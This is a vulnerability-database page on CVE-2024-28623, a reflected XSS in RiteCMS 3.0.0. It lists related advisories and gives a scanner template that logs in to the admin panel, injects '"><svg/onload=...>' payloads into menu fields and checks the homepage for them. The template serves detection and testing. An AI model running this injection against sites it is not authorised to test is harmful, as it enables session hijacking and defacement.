| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| Exploit for Cross-site Scripting in Ritecms | 4 Mar 202403:37 | – | githubexploit | |
| CVE-2024-28623 | 13 Mar 202409:26 | – | circl | |
| RiteCMS 跨站脚本漏洞 | 13 Mar 202400:00 | – | cnnvd | |
| RiteCMS Cross-Site Scripting Vulnerability (CNVD-2025-21552) | 15 Mar 202400:00 | – | cnvd | |
| CVE-2024-28623 | 13 Mar 202400:00 | – | cve | |
| CVE-2024-28623 | 13 Mar 202400:00 | – | cvelist | |
| RiteCMS 3.0.0 - Reflected Cross Site Scripting (XSS) | 18 Aug 202500:00 | – | exploitdb | |
| CVE-2024-28623 | 13 Mar 202408:15 | – | nvd | |
| 📄 RiteCMS 3.0.0 Cross Site Scripting | 18 Aug 202500:00 | – | packetstorm | |
| Cross site scripting | 13 Mar 202408:15 | – | prion |
id: CVE-2024-28623
info:
name: RiteCMS 3.0.0 - Cross-site Scripting
author: 0x_Akoko
severity: medium
description: |
RiteCMS v3.0.0 contains a reflected XSS caused by unsanitized input in the main_menu/edit_section component, letting attackers execute arbitrary scripts in the context of the victim's browser.
impact: |
Attackers can execute arbitrary scripts in the victim's browser, potentially leading to session hijacking or defacement.
remediation: |
Sanitize and validate input in the main_menu/edit_section component, and update to the latest version if available.
reference:
- https://github.com/GURJOTEXPERT/ritecms
- https://nvd.nist.gov/vuln/detail/CVE-2024-28623
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2024-28623
cwe-id: CWE-79
epss-score: 0.01317
epss-percentile: 0.67292
cpe: cpe:2.3:a:ritecms:ritecms:3.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: ritecms
product: ritecms
fofa-query: title="RiteCMS"
tags: cve,cve2024,ritecms,xss,oss,authenticated
variables:
string: "{{rand_text_numeric(13)}}"
flow: http(1) && http(2)
http:
- raw:
- |
POST /admin.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&userpw={{password}}
matchers:
- type: dsl
dsl:
- 'status_code == 302'
internal: true
- raw:
- |
POST /admin.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
mode=menus&menu=main_menu&edit_item=4&name=faq&title=faq&link=faq§ion='"><svg/onload=console.log('{{string}}')>&accesskey='"><svg/onload=console.log('{{string}}')>&submenu='"><svg/onload=console.log('{{string}}')>&edit_menu_item_submitted=%C2%A0OK%C2%A0
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_all(body, "{{string}}", "RiteCMS")'
- 'contains(content_type, "text/html")'
- 'status_code == 200'
condition: and
# digest: 4a0a004730450221009118f5ae2208cfcbdaa7fbf9799af975ebd8908990517077de9556070510be76022017604dcc1d4ca7c4d85e84df845be700d5c016ee95cbc64ce57b87723c59af10:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation